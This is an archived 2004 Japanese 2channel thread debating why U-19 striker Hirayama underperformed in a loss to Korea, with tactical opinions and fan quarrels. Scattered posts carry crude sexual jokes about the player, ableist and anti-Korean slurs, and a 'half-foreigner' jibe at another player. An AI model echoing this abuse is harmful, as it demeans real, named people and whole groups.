2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

どうして平山がこんなに使えないのかを考えるスレ

1 :名無しさん@お腹いっぱい。:04/10/06 22:44:54 ID:t6aG/zE5
結果的に得点には絡んでる平山。
しかしその前にかなりのチャンスを潰している。
なんでだろう?

2 :名無しさん@お腹いっぱい。:04/10/06 22:46:24 ID:3PXNAfIi
2なら

3 :名無しさん@お腹いっぱい。:04/10/06 22:48:57 ID:7hDM0xzX
4なら平山真性包茎

4 :名無しさん@お腹いっぱい。:04/10/06 22:50:25 ID:fBP8rpx9
山本がアテネ連れてったから

5 :名無しさん@お腹いっぱい。:04/10/06 22:52:27 ID:QBzrq/Xj
>>1
森本はカス
カレンはゴミ

こういう結論でOK?

6 :1:04/10/06 22:54:24 ID:t6aG/zE5
平山と森本だったら森本スタメンにするのは俺だけかな?

7 :名無しさん@お腹いっぱい。:04/10/06 22:56:12 ID:vsnV9Tp1
>>1
それがサッカーじゃないのか

8 :名無しさん@お腹いっぱい。:04/10/06 22:58:26 ID:by9MPPVs
>>1

下手だから。所詮高校レベル。ただそれだけの選手。
みんな夢を持っちゃってるだけだよ。


9 :名無しさん@お腹いっぱい。:04/10/06 22:58:30 ID:pwmR+j+1
>>6
体力15分しか持たないぞ森本は

10 :名無しさん@お腹いっぱい。:04/10/06 22:59:52 ID:fBP8rpx9
平山だとか兵頭だとか
大学なんて行って2頭を追おうとしてる奴は
精神的に使えないから連れて行くべきじゃないということがわかった

11 :名無しさん@お腹いっぱい。:04/10/06 23:00:41 ID:vsnV9Tp1
韓国にも大学生いるんじゃないのか?

12 :名無しさん@お腹いっぱい。:04/10/06 23:02:12 ID:GTrThBAP
ストライカーじゃない高性能電柱

13 :名無しさん@お腹いっぱい。:04/10/06 23:02:47 ID:6mkHauTO
アウトサイドでこなせ

14 :1:04/10/06 23:04:10 ID:t6aG/zE5
>>12
ポストプレーも凡ミスばっかじゃないか?

15 :名無しさん@お腹いっぱい。:04/10/06 23:08:43 ID:rciX/eyr
背が高い


































それだけ

16 :1:04/10/06 23:10:49 ID:t6aG/zE5
>>11
実際韓国はプロ選手は11人それにくらべ日本は14人
しかも韓国にはかなりの大学生がスタメン。
それなのにこの差はなんなのか?

17 :名無しさん@お腹いっぱい。:04/10/06 23:11:58 ID:lP7JvEFC
日本のサッカー協会のお偉いさん方には、きっと1つの模範があるんじゃないのかね
背が高く強いストライカーが居て、得点はバンバンするし、
得点できなくても、その強さ・高さから、落とし込みとかでアシストできてしまう
そんな選手像

でも、そんな選手は居ないからアレコレ工夫して戦ってきた
ところが、それが出来そうな(出来るワケないのに)平山が出てきたから
飛びついちゃって考える事までやめた

その結果が、このチーム
今の結果で全てが決まるワケじゃないけれど
このままでは、谷間と揶揄されたアテネ組どころか
本当に谷底の酷いチームになりそうではある

18 :名無しさん@お腹いっぱい。:04/10/06 23:18:06 ID:diXHj347
競争相手が居ないからだろうな。

19 :名無しさん@お腹いっぱい。:04/10/06 23:18:39 ID:EidFsj30
怪我してんだろ

20 :名無しさん@お腹いっぱい。:04/10/06 23:21:14 ID:/TklPSKS
U19のふがいなさを
一選手の責任に全て転嫁するなんざ
暗に大器だと認めていると思うのだが

21 :名無しさん@お腹いっぱい。:04/10/06 23:28:02 ID:1bt34VTM
大学行って正解


22 :名無しさん@お腹いっぱい。:04/10/06 23:33:43 ID:rciX/eyr
>>20
まあ、あれだけ「怪物、怪物」って持上げられた挙句これじゃあな…

23 :名無しさん@お腹いっぱい。:04/10/06 23:39:05 ID:/TklPSKS
>>22
それはマスコミや軽薄なファンの
せいであって平山の責任ではないと思うんだけど。
てゆ〜か、チーム全体に問題があるのは明白じゃん!

24 :名無しさん@お腹いっぱい。:04/10/06 23:41:21 ID:7eQW6pZF
アンチ平山はもうダメだなw
FWは結果残せばいいの

おおっと地震だ
でかい

25 :名無しさん@お腹いっぱい。:04/10/06 23:41:43 ID:zZ97EiJb
期待が大きい分、ふがいないプレーが続くとね。
走れないなら増量だな、もうスピードは捨てて、どんなヤツにもあたり負けしない身体にしよう。

26 :名無しさん@お腹いっぱい。:04/10/06 23:46:33 ID:/TklPSKS
>>25
小嶺も言ってたけど
あの体はモノになるまで時間かかるらしいから
焦らずダメ元で気長に期待した方がいいよ。
…その前に協会のクソスケジュールで潰されそうだけど!

27 :名無しさん@お腹いっぱい。:04/10/06 23:48:05 ID:s1d468uk
怪我もあったし俺はこんなもんだと思うんだが
みんなもっと期待してたのか?

28 :名無しさん@お腹いっぱい。:04/10/06 23:54:43 ID:zZ97EiJb
>>27
正直かなり期待してたw
高校サッカー決勝を生で観て、コイツだ!って感じ。まだ期待してるけどね

29 :名無しさん@お腹いっぱい。:04/10/06 23:57:12 ID:8xz1pEQM
選手権ではシュートがめちゃうまかったしな。早いし、コースもよかったし

30 :名無しさん@お腹いっぱい。:04/10/06 23:59:54 ID:0LgElHkf
>>26
モノになる前に引退とならなきゃいいけど

31 :名無しさん@お腹いっぱい。:04/10/07 00:04:00 ID:b1YTQq6H
背が高いだけだから。
もし背を活かしバレをーやってても補欠どまりだろう。
基本的な運動能力がスポーツで飯を食うには低い位置にしかないし、
今後化けるほど伸びることも無いだろう。

32 :名無しさん@お腹いっぱい。:04/10/07 00:12:48 ID:7zFr/1pL
アンチはサッカーもバレーも知らないだろwwwwwwwww

33 :名無しさん@お腹いっぱい。:04/10/07 00:14:08 ID:KTcKa3yl
勉学に勤しんでいるから。

34 :名無しさん@お腹いっぱい。:04/10/07 00:23:16 ID:njH2eSYA
>>31
背が高いだけでU23や19の代表に
選ばれるなんて…日本終わってるね(w

35 :名無しさん@お腹いっぱい。:04/10/07 00:24:06 ID:7zFr/1pL
そうか。じゃこんなところにのこのこ来ないことだな

36 :名無しさん@お腹いっぱい。:04/10/07 00:28:40 ID:bBa9B8Ik
背が高いだけならアナザー平山でも務まるが代表には選ばれない。
それは裏平山はただデカイだけだから。
相太にーちゃんの方はこの世代にしては珍しく足元が柔らかく、他と比べて決定力がある。
動き・反応が遅いのはマイナスだが・・・

37 :名無しさん@お腹いっぱい。:04/10/07 00:31:37 ID:iYnWrTrB
デク人形

38 :名無しさん@お腹いっぱい。:04/10/07 00:32:47 ID:U77G1HQd
トラップが少しおおきくなってシュートまでのロスがある
これを改善できれば凄そうだ


39 :名無しさん@お腹いっぱい。:04/10/07 00:36:18 ID:7zFr/1pL
アンチは上の世代とやってるんだってこと知らないのか 恥ずかしいな

40 :名無しさん@お腹いっぱい。:04/10/07 00:37:39 ID:1DSYEumz
国見の奴らは使えない

41 :名無しさん@お腹いっぱい。:04/10/07 00:38:06 ID:tXYG0Tjp
何かモッサリしてるな

42 :名無しさん@お腹いっぱい。:04/10/07 00:40:18 ID:8wMMyf48
本当にパス上手いな
というか柔らかい

43 :名無しさん@お腹いっぱい。:04/10/07 00:41:04 ID:xSZ0A6rB
平山はあれで50メートル6秒7、垂直とび65cmって
信じられません。

44 :名無しさん@お腹いっぱい。:04/10/07 00:41:36 ID:njH2eSYA
>>40
国見に限らず広島ユースも
市船も使えないんだけど…。



いい加減、出身校とかで選手見るのやめたら?

45 :実況禁止:04/10/07 00:41:51 ID:+4pTeF7E
ここでは実況禁止です。


実況は↓の板の関連スレで

日本代表+WC+実況
http://sports2.2ch.net/wc/
スポーツch
http://live15.2ch.net/dome/
番組ch(朝日)
http://live16.2ch.net/liveanb/

46 :名無しさん@お腹いっぱい。:04/10/07 00:44:13 ID:h3Wfep/u
つーか、そもそも守備に下がり過ぎなんだよ。
平山は前線に張り付いて、ボールを受けてキープし
周りの上がりを待つのが役割だろ。
アンリみたいにガンガン走り回れるわけじゃ無いんだから
とりあえず最前線で存在しろっての。

47 :名無しさん@お腹いっぱい。:04/10/07 00:44:18 ID:I4EN0DJW
これじゃあ北京もアフリカW杯も終わりだな。キムチもそれっぽいけど。

48 :名無しさん@お腹いっぱい。:04/10/07 00:44:55 ID:19tmCSFV
>>43
それでも最初の10mぐらいはやたら遅いんじゃねーの?
垂直跳びも、飛ぶのに5秒ぐらいかかるとか(w

49 :名無しさん@お腹いっぱい。:04/10/07 00:46:22 ID:njH2eSYA
>>46
最前線にいても
あの状態じゃ、中盤と間がありすぎて
キープなんかできねぇよ

50 :名無しさん@お腹いっぱい。:04/10/07 00:47:05 ID:UbzHpTOy
ジャイアント馬場

51 :名無しさん@お腹いっぱい。:04/10/07 00:48:32 ID:m/0o91bs
>>46
下がらなきゃいけない状況を作ってる中盤とその後ろに問題がある。

52 :名無しさん@お腹いっぱい。:04/10/07 00:50:06 ID:fDBwEb8W
15試合で平山17点
15試合でカレン0ゴール
カレンギャル必死すぎ

53 :名無しさん@お腹いっぱい。:04/10/07 00:52:45 ID:oMdWINA3
平山擁護してるやつは大熊・山本なみのアホ

54 :名無しさん@お腹いっぱい。:04/10/07 00:54:06 ID:8wMMyf48
結果出してるだけにアンチは悲惨だなwww

55 :名無しさん@お腹いっぱい。:04/10/07 00:54:22 ID:r76jHcNO
カレン擁護している奴は大熊・山本以下のアホ

56 : :04/10/07 00:57:43 ID:yxLwXHew
擁護も何もはやくAにいけよってかんじだ。(w
鈴木よりましに見える。

平山も森本も
パスもまともにまわせない中盤のチームじゃいる意味ないわな

57 :名無しさん@お腹いっぱい。:04/10/07 00:58:18 ID:fDBwEb8W
平山、今日も1ゴール、1アシスト
どっかの走り回ってるだけで結果残さない
半外人とは大違い

58 :名無しさん@お腹いっぱい。:04/10/07 00:58:36 ID:m/0o91bs
>>53
そんなことしか言えないんですか?

59 :名無しさん@お腹いっぱい。:04/10/07 00:59:18 ID:b1YTQq6H
結果だしてるだと?
あれっぽっちで満足してる奴はめでたいね。
自分が向上心ないからって、平山にも求めないのは間違いだぞ。

60 :名無しさん@お腹いっぱい。:04/10/07 01:01:02 ID:8wMMyf48
>>59
今大会2ゴール4アシストですが何か?
さっさと氏になさいよwww

61 :名無しさん@お腹いっぱい。:04/10/07 01:05:37 ID:njH2eSYA
>>59
欲を言えばキリがないけど
一応最低限のノルマはこなしてるだろ。
てゆ〜か、もっと上の結果を求めるなら平山以外の
選手も同様だと思うぞ(w

62 :名無しさん@お腹いっぱい。:04/10/07 01:06:24 ID:xsnyDYWt
平山は久保から高さ以外のキープ力速さ上手さ展開力などすべてを引いた選手

高さだけでは世界はおろか、日本でレギュラーとれるかも危うい
速さとかは先天性的なところが大きいし、足下の上手さ展開力は後天的だが、今からは伸びない。絶望的。


それに対し、カレンはすごい。あの体力と決定力の無さは驚異的。まあ、後者は頑張れば、並の選手くらいまでならなんとかなるな

もし、数年後残るとしたらカレン。今のままの中盤でいったら、カレンの献身的な守備がないと崩壊する。
つまり、日本の目標は攻撃的FWを2人おけるような、中盤を構成すること
それから、高さに最低+αとして、速さ足下の上手さのどちらかをもってるFW

63 :名無しさん@お腹いっぱい。:04/10/07 01:06:48 ID:xSZ0A6rB
つか何で熊って3トップにしなかったの?
あそこまで中盤の主導権握れない放り込みサッカーなら
3トップでいいじゃん、って思ったんだけど。
苔口-平山-カレン(森本)
この3人で攻めて来いでいいと思うんだがなあ。

いやまあ、育成とかそういう観点は全く無くなりそうだけど。

64 :名無しさん@お腹いっぱい。:04/10/07 01:11:31 ID:oMdWINA3
>>56
A代表って・・・
史上最低最悪の代表ができるぞ
こいつがいるせいで北京五輪はあきらめてるのに
W杯までダメにさせないでくれ。
俺はこいつがプロに入らないことを祈ってる

65 :名無しさん@お腹いっぱい。:04/10/07 01:13:07 ID:inNig9Pi
顔と喋りが一見池沼っぽい。


66 :名無しさん@お腹いっぱい。:04/10/07 01:14:42 ID:njH2eSYA
>>64
お前、そこかしこでやたらと平山叩いているけど
しつこすぎて気持ち悪いよ…

67 :名無しさん@お腹いっぱい。:04/10/07 01:14:59 ID:1DSYEumz
こんなノロノロした木偶の坊プロじゃ通用しねーよ
大学に逃避して正解だったね

68 :名無しさん@お腹いっぱい。:04/10/07 01:16:06 ID:JWOFQ3d/
>>35
>そうか。じゃこんなところにのこのこ来ないことだな


ここのスレタイ嫁

69 :名無しさん@お腹いっぱい。:04/10/07 01:16:26 ID:7zFr/1pL
64はサッカー知らないんだろ みる目がない奴は黙っとけ 恥さらしてんぞ

70 :名無しさん@お腹いっぱい。:04/10/07 01:16:55 ID:IA5iufLY
ケガだろ。

71 :名無しさん@お腹いっぱい。:04/10/07 01:16:55 ID:KjqDYKcz
平山がキープ力がなさすぎるこいつがまともにポストが出来てりゃ
シュートまで持ち込めた!!ってゆうシーンが多々あったのはたしか
っしょ森本がはいってなかったら流れがかわんなかったのは事実。


72 :名無しさん@お腹いっぱい。:04/10/07 01:17:47 ID:VzvKHXvC
いいからもう一回試合見ろ

73 :名無しさん@お腹いっぱい。:04/10/07 01:19:30 ID:QZMsWmLF
今日のゴールはやっと決めてくれたって感じがする。
いつもああいうのを見たいんだが。

74 :実況禁止:04/10/07 01:19:45 ID:+4pTeF7E
ここでは実況禁止です。


実況は↓の板の関連スレで

日本代表+WC+実況
http://sports2.2ch.net/wc/
スポーツch
http://live15.2ch.net/dome/
番組ch(朝日)
http://live16.2ch.net/liveanb/

75 :名無しさん@お腹いっぱい。:04/10/07 01:20:36 ID:nui37ZIL
>>65
ワラタ

76 :名無しさん@お腹いっぱい。:04/10/07 01:20:37 ID:JWOFQ3d/
実況してないじゃん

77 :名無しさん@お腹いっぱい。:04/10/07 01:20:56 ID:8wMMyf48
>>73
クロスが上手い奴がいねぇんだもん

78 :名無しさん@お腹いっぱい。:04/10/07 01:21:34 ID:f9TQdTuw
平山サイコー

79 :名無しさん@お腹いっぱい。:04/10/07 01:21:50 ID:7zFr/1pL
>>68

何だよ 意味不明。
勉強に勤しんでるからっていうレスに対してだが お前そいつか?
サッカーも知らないアンチに対してサッカー板には来るなって意味なんだがな

ああ、糞レスに相手してしまった


80 :名無しさん@お腹いっぱい。:04/10/07 01:24:32 ID:JWOFQ3d/
>>79
アンチスレに信者は来るな、と。

81 :PK予想:04/10/07 01:26:33 ID:f9TQdTuw
5−2 で JAPAN勝利を確信!!

82 :名無しさん@お腹いっぱい。:04/10/07 01:27:14 ID:7zFr/1pL
ああ、そういう意味かw 納得。信者じゃねーよ
サッカー知らないから書いただけ

83 :名無しさん@お腹いっぱい。:04/10/07 01:27:15 ID:y5aXsCOr
とったどー!

84 :名無しさん@お腹いっぱい。:04/10/07 01:27:16 ID:EAwWs7fn
はっきりいってつくば大学の体育専門学群なんて勉強なんかしてないよ。
頭なんてほとんど使ってないに等しい。ただのバカ集団の集まり。

85 :名無しさん@お腹いっぱい。:04/10/07 01:27:19 ID:f09oO53n
>>81
もう結果は出ているぞ。

86 :名無しさん@お腹いっぱい。:04/10/07 01:29:17 ID:QJyQYdbA
平山はいい選手なのは間違いない。来年6月まで姿くらまして釜本が
言ってたみたいに自分のための練習をじっくりやったほうがいいな。

87 :名無しさん@お腹いっぱい。:04/10/07 01:29:35 ID:fDBwEb8W
FWは点取ればそれでいいんだよ
足元そこそこうまくて中盤の仕事もして、ディフェンスもして
それでも点は取らない城、ヘナギ、カレン系統の便利屋FWより
90分死んでても1点取ってくれるFWの方が全然いい

88 :名無しさん@お腹いっぱい。:04/10/07 01:30:07 ID:JWOFQ3d/
>>82
それは悪かったな。妙にムキになってる(様に見えた)もんだから、勘違いした。

ちなみに、俺は>>33とは関係ないから。

89 :名無しさん@お腹いっぱい。:04/10/07 01:47:26 ID:IXjnvtuI
高卒は知的障害者PART UW
http://society3.2ch.net/test/read.cgi/soc/1096469924/


90 :名無しさん@お腹いっぱい。:04/10/07 01:50:24 ID:wVQ5YJYM
飛べば点取れるしタッパあるから競り合いだってできるはず。
でも競らない飛ばない。
でも飛んだら点入るんだよな、コイツ。
やる気の問題か?

91 :名無しさん@お腹いっぱい。:04/10/07 01:51:06 ID:xvQSnnGz
平山がチェリーだからだろ
だれか筆おろししてやってくれ。

92 :名無しさん@お腹いっぱい。:04/10/07 01:52:11 ID:f09oO53n
>>87
そうだな、でも平山は90分死んでいて点を取らないんだよな。

93 :名無しさん@お腹いっぱい。:04/10/07 01:54:28 ID:LCB0548f
高校選手権で活躍しすぎたんだよ。
だからこれからはパッとしないんじゃないかな。
そりゃたまには得点することもあるだろうけど。

94 :名無しさん@お腹いっぱい。:04/10/07 02:21:30 ID:pCmpOPAz
>>87
そういう選手は使いたくない。
キミも監督をやってみればわかる。

95 :名無しさん@お腹いっぱい。:04/10/07 02:21:37 ID:zF1KMCFi
熊が平山にやらせようとしていることを完璧にこなせる選手が世界に何人いるのかと。


96 :名無しさん@お腹いっぱい。:04/10/07 02:22:25 ID:RjkVvFsU
平山と大熊はアンダー19の巨大な不良債権だな。

97 :名無しさん@お腹いっぱい。:04/10/07 02:22:52 ID:UkMef1zA
NBAの中国人バスケットボーラーみたいな走り方してる

98 :名無しさん@お腹いっぱい。:04/10/07 02:25:38 ID:RjkVvFsU
大熊は、平山に何かをやらせようとするよりも、
1プレイでも多く平山にプレイする機械を与えて得点決めて結果を残して欲しい。
ただそれだけだ。勝利より平山に点取らす方が優先順位上なんじゃないか。
そうとしか思えない試合内容だし、システムだ。

99 :名無しさん@お腹いっぱい。:04/10/07 02:28:47 ID:ZVOYMrXe
y9kpmN7P=oMdWINA3=RjkVvFsUは
ずっといろんなスレで平山たたきに粘着してるなw
精神を病んでるのか?

100 :名無しさん@お腹いっぱい。:04/10/07 02:29:51 ID:RjkVvFsU
平山ターゲットにして放り込んでその後のシステムや役割が全く考慮されてない。
平山でキープ出来なかったら敵にボール取られようが、カウンターから失点しても仕方無い平山と身中システムだ。
絶対平山下げないしな。

101 :名無しさん@お腹いっぱい。:04/10/07 02:30:11 ID:JgSLChAN
両足傷めてんのに、1ゴール、1アシスト。
これ以上、どうすりゃいいの。by平山。
といってもカレンの動きは点以上の価値あるし、森本だってやっぱり大器だ。
千真もいいゴールだった。
WYまでに中盤なんとかしてくれ。

102 :名無しさん@お腹いっぱい。:04/10/07 02:31:43 ID:Ai+UU/b7
やはりただものじゃない。
今日もまたその逸材っぷりを改めて証明した。

103 :名無しさん@お腹いっぱい。:04/10/07 02:32:27 ID:ZnFGtk0D
>>97
似てるw

104 :名無しさん@お腹いっぱい。:04/10/07 02:32:32 ID:sHeieoG9
微妙・・・

105 :名無しさん@お腹いっぱい。:04/10/07 02:32:34 ID:RjkVvFsU
>>99
出来の悪い選手を叩くのは当たり前の事。
くだらないレッテル張りは辞めてサッカーの話しな。ストーカー君。


106 :名無しさん@お腹いっぱい。:04/10/07 02:33:25 ID:rbxXG7vU
鈍足だし体デカイから振りもデカイ
シュートコース詠まれて止められる

107 :名無しさん@お腹いっぱい。:04/10/07 02:34:07 ID:AR+KOFHm
>>105
図星つかれたんだなw

108 :名無しさん@お腹いっぱい。:04/10/07 02:35:31 ID:sHeieoG9
182〜185ぐらいでそこそこ動ける奴の方が良い
さすがに190もあると、電柱的な使い方しかきでない

109 :名無しさん@お腹いっぱい。:04/10/07 02:35:46 ID:RjkVvFsU
>>99
現実に今大会通して、結果も内容も出してない役立たずの第一FWを何故かばうのか。
しかも対戦相手はアジアだぞ。
俺の言う事が違うなら意見を言えよ。何も言えないレッテル張君。

110 :名無しさん@お腹いっぱい。:04/10/07 02:36:37 ID:nYxNxXrh
中盤は下手ってわけではないと思うが、状況判断がまずい。
雑でもいいからダイレクトでプレーする所、しっかりつなぐ所、
すぐに前線に放り込む所、キープして味方を待つ所
この辺りの判断がバラバラだと感じた。

111 :名無しさん@お腹いっぱい。:04/10/07 02:37:01 ID:AR+KOFHm
>>109
2得点4アシストで最も結果出してる選手だろw
頭大丈夫か?

112 :名無しさん@お腹いっぱい。:04/10/07 02:37:05 ID:t4Jp9k7x
オレからすれば今のゴールは値千金

113 :名無しさん@お腹いっぱい。:04/10/07 02:38:18 ID:l73ZxDei
>現実に今大会通して、結果も内容も出してない役立たずの第一FWを何故かばうのか

誰?
カレンとかいう人のこと?

114 :名無しさん@お腹いっぱい。:04/10/07 02:39:22 ID:QMiK5BvD
>>109
結果はでとる、一応。
嫌いなんだねー。

115 :名無しさん@お腹いっぱい。:04/10/07 02:42:14 ID:RjkVvFsU
>>111
約二匹、大熊、平山と共に心中派が居るな。粘着ぶりが似てるな。
一次グループ入れて5試合だよ。こいつは病気か。

116 :名無しさん@お腹いっぱい。:04/10/07 02:44:25 ID:NGFafHi9
>>115
4試合ですがw
典型的な代表厨だなw

117 :名無しさん@お腹いっぱい。:04/10/07 02:44:29 ID:l73ZxDei
ID:RjkVvFsUは本物じゃないのか?
マジで気持ち悪い・・・

118 :名無しさん@お腹いっぱい。:04/10/07 02:44:59 ID:QMiK5BvD
>>115
ユースごときでガタガタいうなよ。

119 :名無しさん@お腹いっぱい。:04/10/07 02:47:23 ID:nui37ZIL
平山って100m何秒?

120 :名無しさん@お腹いっぱい。:04/10/07 02:49:55 ID:l73ZxDei
ID:RjkVvFsUが国内板の平山スレまで出張しました

411 名前:U-名無しさん 投稿日:04/10/07 02:43:21 ID:P30xCdE/
うわ気持ちわりいなこのスレ・・・


121 :名無しさん@お腹いっぱい。:04/10/07 02:52:52 ID:RjkVvFsU
よほど平山が悪く言われるのが嫌みたいだな。
物凄い少数である事を自覚出来ない馬鹿はしつこい。

少数*大熊平山と共に心中マンセ派*なのはとっくに判ってるから隠さないで、
堂々と平山の何が何が良いのか第一FWとして何が通用してるのか言え。

と、書きおわった段階でレッテル張りしか出来ない平山信者か>>120



122 :名無しさん@お腹いっぱい。:04/10/07 02:54:56 ID:RjkVvFsU
おらおら平山信者。平山の何が通用して何が良いのか皆に言ってみ。

て、書いても平山信者はただひたすらレッテル張を繰り返すしか脳がない。



123 :名無しさん@お腹いっぱい。:04/10/07 02:58:39 ID:l73ZxDei
>>122
( ゚,_J゚)

124 :名無しさん@お腹いっぱい。:04/10/07 03:04:33 ID:Ai+UU/b7
煽り下手が無用に煽ってるだけのつまらないスレですね。

125 :名無しさん@お腹いっぱい。:04/10/07 03:07:42 ID:w/WSmU/N
カレンはよかったと思うのだが・・・。
その他の選手のプレッシング、位置取り、中盤構成等に
明らかに相手と明確な差があったと思う。

それは選手個人の意識問題でもあるが、もっとも低能を暴露したのは



 大 熊 じ ゃ な い の か ?


126 :名無しさん@お腹いっぱい。:04/10/07 03:08:26 ID:nNTPaXPd
ここ最近は調子出てないけど、ゴール前での冷静さと、キープしてシュートできるのが良いと思う。
てゆうかU-23のときの方が平山機能してるよねw

127 :名無しさん@お腹いっぱい。:04/10/07 03:11:27 ID:RjkVvFsU
カレンは守備というか殆どMFとして運動量豊富に終始動きまくってた。




128 :名無しさん@お腹いっぱい。:04/10/07 03:13:19 ID:FlBxVXxJ
U23で通じた高さがなぜかこの世代の韓国相手に通じてなかったな

129 :名無しさん@お腹いっぱい。:04/10/07 03:14:55 ID:f09oO53n
>>128
捻挫していたからな。

130 :名無しさん@お腹いっぱい。:04/10/07 03:15:07 ID:2dBLRwq+
大熊のサッカーで平山とカレンの役割が違うことは見ればわかるだろ


大熊がカレンに求めていることは得点じゃないことは大熊のデカい声聞けばわかる

131 :名無しさん@お腹いっぱい。:04/10/07 03:16:36 ID:RjkVvFsU
監督が試合中終始、いちいち事細かく選手個人に対し、指示出しまくってたら、選手達は監督の指示通りのサッカーしてたと思う。
それであの内容か。物凄い重症だ。
このチームには大手術が必要だ。

132 :名無しさん@お腹いっぱい。:04/10/07 03:20:31 ID:6TW+w6LE
>>128
なんかUAE参加のアドバンテージがまったくなくなったよな。
普通の19才ではすごい方の選手に落ち着いてしまった。
ただ、クロスがもう少し供給されるチームだったらもっと点取ってるだろうけど。

133 :名無しさん@お腹いっぱい。:04/10/07 03:37:24 ID:w/WSmU/N
平山は大器なのは間違いないのだろう。
認めざるえない。
何故なら、私達より遥かにサッカーに携わっているJ/OB達がそう言っているのだからだ。

ただ今大会は、平山はマークされていたと言う事もあるが
何故かモチベーションが低い、足の捻挫、フル出場のため疲労困憊。

などなど、個人評価には悪条件が付いていた事も、考慮しなくてはいけないと思う。
ただそれを差し引いたとしても、二点目は「流石 平山 ここにあり」って感じだった。

結果負けてしまったことが、平山パッシングに火を点けているのだろうか?
上記で大器とあるが大器晩成ならサッカー選手として致命的。

自分としては森本の方が、平山より将来性は感じるし
カレンの方は、いずれA代表に行くだろうと思える仕事をしていた。

結果的には平山を連戦させた監督ミスもあるだろうし、
選手選考で見る目も無かったんだと思う。 それともこの年代の人材不足なのか。

そう考えると平山が際立って見えるのもうなずける。
この先の日本サッカー界が心配になったと言う事も無いだろう。(言ってるけど)

134 :名無しさん@お腹いっぱい。:04/10/07 03:45:20 ID:f09oO53n
川淵とかあの辺が褒めると選手は伸びないってジンクスでもあるんじゃないの?

135 :名無しさん@お腹いっぱい。:04/10/07 04:00:18 ID:w/WSmU/N
今回の日本対韓国戦を自分なりに分析してみた。
まず根本的に違ったのが、両国の最終ラインからの攻撃の組みたて方。

韓国は中盤にいる選手に出すのではなく、サイドのスペースへ走りこんだ選手に対しパスをしているのに対して、
日本は止まっている選手にショートパスの繰り返しと、味方のいない前線にロングフィードのみ。

特に水元にボールが渡ると、前方を見向きもせずただクリアーするだけ。
そのクリアーもハーフライン付近までしか飛ばず、相手に取られて完全に支配されてしまっていた。

もう1つが、完全に平山との生命線を切られてしまっていた。
平山がボールを頭で競り勝ち流しても、周りに味方がいない、上がってこない等の場面もあり、
攻撃する手段のメイン部分が完全に機能していなかった。

これについては、戦術の問題だと思うし、ある意味選手は被害者だと思う。
その中で一人、気をはいていたのがカレン。
カレンがよく見えたのは、回りの動きと連動した動きを彼だけがしていたからで、
韓国は殆んどがその動きを心がけていたように見えた。

確かに選手の技術は相手国と比べて見劣りしていたが、
それ以上に戦術で負けていると感じた人も、いたのではないだろうか?

136 :名無しさん@お腹いっぱい。:04/10/07 04:20:57 ID:w/WSmU/N
最後に二つほど。
中盤付近でフリーでボール保持している選手がパスする相手を
探しいてるシーンが目立っている。

つまりパスコースが遮断されていて、あったとしてもその後ろに相手がマークしているから、
出すに出せない状況だったと言うわけであり、また、動いてもらう動きが無かったと言う事でもある。

それに対し韓国は、日本と相対していて非常に組織的であり、
自ドリブル時に味方に対して走りこんで欲しいコミュニケーションを取る動きもしていた。

次にコミュニケーションの違い。
国民性なのかもしれないが、日本のほうがプレスが遅く、譲り合っている場面も合った。
しかし韓国はやはり、前線でのプレスが速く、周りもそれに連動してパスコースを潰す動きをしていた。

これに対しては簡単に出来る事では無いのだが、今回の敗因の一因にも挙げられるのではないだろうか?

137 :名無しさん@お腹いっぱい。:04/10/07 05:20:45 ID:NBOBAvfU
高卒は知的障害者PART UW
http://society3.2ch.net/test/read.cgi/soc/1096469924/


138 :名無しさん@お腹いっぱい。:04/10/07 14:58:00 ID:YS9/8vkX
平山が点取ったから慌てて立てたスレはここですか?

139 :名無しさん@お腹いっぱい。:04/10/07 15:15:22 ID:lmJYiiw9
平山って何か疾患があって全力疾走を禁止されたりしてるのかな?

140 :名無しさん@お腹いっぱい。:04/10/07 15:22:34 ID:Fs3gheZg
>>139
きっとそう!
じゃなきゃ、あの出足の遅さは説明つかないもん。

141 :名無しさん@お腹いっぱい。:04/10/07 15:26:18 ID:i6/wyykm
>平山はもともとケガを持っていて、鍛えられていなかった。
>ずっと試合にも出ていなくて自転車トレーニングくらいしかしていなかった。
熊の会見聞く限り、かなり状態が悪かったみたいだが。今大会でのポストが叩かれているが、
これはしょうがないだろう。
逆にこんな状態でもゴール・アシスト決められるんだから、やっぱこの年代のFWでは
群を抜いている逸材だろ。
このチームでの結果を見てもゴール数は圧倒的だし。


142 :名無しさん@お腹いっぱい。:04/10/07 15:28:11 ID:i6/wyykm
>かなり状態が悪かったみたいだが。
足の状態がって意味な。後、引用は、
ttp://sportsnavi.yahoo.co.jp/soccer/japan/kaiken/200410/at00002786.html
の熊のコメントからの引用

143 :名無しさん@お腹いっぱい。:04/10/07 15:33:49 ID:8SVN7y2r
遅くても必死さが伝わってくればいいんだけど。
せめて1試合に2、3回でも全力疾走を見せて欲しかった。

144 :名無しさん@お腹いっぱい。:04/10/07 15:37:13 ID:kVdObOa/
高木くらいにはなってくれるかと期待したが
船越レベルで終わりそうだな

145 :名無しさん@お腹いっぱい。:04/10/07 15:42:48 ID:x58SJZPr
結果はともかく
俺が言いたいのは
平山をつくばや土浦で
のんびり買い物させてやれ
ということ

どっちも何もないけどw

146 :名無しさん@お腹いっぱい。:04/10/07 16:10:01 ID:dh+IKuQr
>>145
秋葉原まで一時間くらいで来られる常磐新線とかいうのが出来るんだろ?
だれかヲタの世界に引き込めよ

147 :名無しさん@お腹いっぱい。:04/10/07 18:06:23 ID:eHoUwtH/
>>135
自分もそう思った。
戦術的に策がなさすぎたし、組織的な動きもまったくなかった。
ただ、サイドを持ち上がるのと、平山に当てるだけ。
その平山があの調子。
小学生かと思った。
熊が「森本ぉ、追いつけ!」とどなっていたのを聞いた時、選手に同情したよ。
誰だって追い付きたいんだよ、監督。

148 :名無しさん@お腹いっぱい。:04/10/07 19:35:25 ID:pB294x0U
まぁ、日本のエース9番、10番が大学生だからな。
5月に西が丘で大学の対抗戦(筑波大−国士大)、観に行ったけど勝っても負けても笑顔、
試合中もなんか相手と喋ってたし、なんか本当に『部活動』って感じだった。
接触プレーもないし、あんな環境でフィジカルなんて鍛えれるわけない。
あんまり期待しない方がいいと思うよ


149 :名無しさん@お腹いっぱい。:04/10/07 19:38:35 ID:fjyhZX9g
あの中では当たりに対する強さは飛び抜けてたよ
周りのフォローが無ければたとえばア杯の鈴木のように
素人目には役に立ってないように見えるだけだ

150 :名無しさん@お腹いっぱい。:04/10/07 19:42:03 ID:53eQiyKO
>>148
大学性は、違う意味で接触プレー満載なわけですが

